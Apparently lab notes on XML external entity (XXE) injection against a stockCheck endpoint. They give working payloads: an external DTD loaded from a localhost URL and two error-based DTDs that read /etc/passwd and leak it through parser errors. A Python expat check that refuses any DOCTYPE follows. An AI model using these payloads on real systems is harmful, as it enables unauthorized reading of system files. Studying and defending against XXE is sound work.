1 - Exploiting XXE using external entities to retrieve files

Reference: PayloadsAllTheThings, XXE Injection/README.md (swisskyrepo/PayloadsAllTheThings on GitHub)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY % local_dtd SYSTEM "http://localhost:40817/feedback/screenshots/7.xml">
    %local_dtd;
]>
<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>

DTD that generates an error:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

DTD that generates an error II:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;
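
Defensive counterpart, added here as an example (not code from the lab or from PayloadsAllTheThings): every DTD above only takes effect if the parser accepts the DOCTYPE in the submitted document, so the check below refuses any DOCTYPE before its entities are processed. It uses Python's standard-library expat binding; parse_stock_check, is_rejected and DTDForbidden are hypothetical names, and the two sample documents are the stockCheck body from above with and without its DOCTYPE.

```python
import xml.parsers.expat as expat

class DTDForbidden(ValueError):
    """Raised when a submitted document carries a DOCTYPE declaration."""

def parse_stock_check(xml_bytes):
    """Parse a <stockCheck> body into a dict, refusing any DTD."""
    parser = expat.ParserCreate()
    fields, path, text = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when the DOCTYPE is seen, before its entity declarations
        # are handled, so neither %local_dtd; nor %file; is ever resolved.
        raise DTDForbidden(f"DOCTYPE {name!r} rejected")

    def on_start(tag, attrs):
        path.append(tag)
        text.clear()

    def on_end(tag):
        # Keep only the direct children of <stockCheck>.
        if len(path) == 2 and path[0] == "stockCheck":
            fields[tag] = "".join(text).strip()
        path.pop()
        text.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return fields

def is_rejected(xml_bytes):
    """True if the document is refused because it declares a DTD."""
    try:
        parse_stock_check(xml_bytes)
    except DTDForbidden:
        return True
    return False

# Sample inputs: the request body from these notes, without and with its DOCTYPE.
BODY = b"<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>"
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?>\n' + BODY
WITH_DOCTYPE = (b'<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE root [\n'
    b'    <!ENTITY % local_dtd SYSTEM "http://localhost:40817/feedback/screenshots/7.xml">\n'
    b'    %local_dtd;\n]>\n' + BODY)
```

A request that fails this check can be logged and answered with a generic error, so parser messages are not echoed back to the client.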